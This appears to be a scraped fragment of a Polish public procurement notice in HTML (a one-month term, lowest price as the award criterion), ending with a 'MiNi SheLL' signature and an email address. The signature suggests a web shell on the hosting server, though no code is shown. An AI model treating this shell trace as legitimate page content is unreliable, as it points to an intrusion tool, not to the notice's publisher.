<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com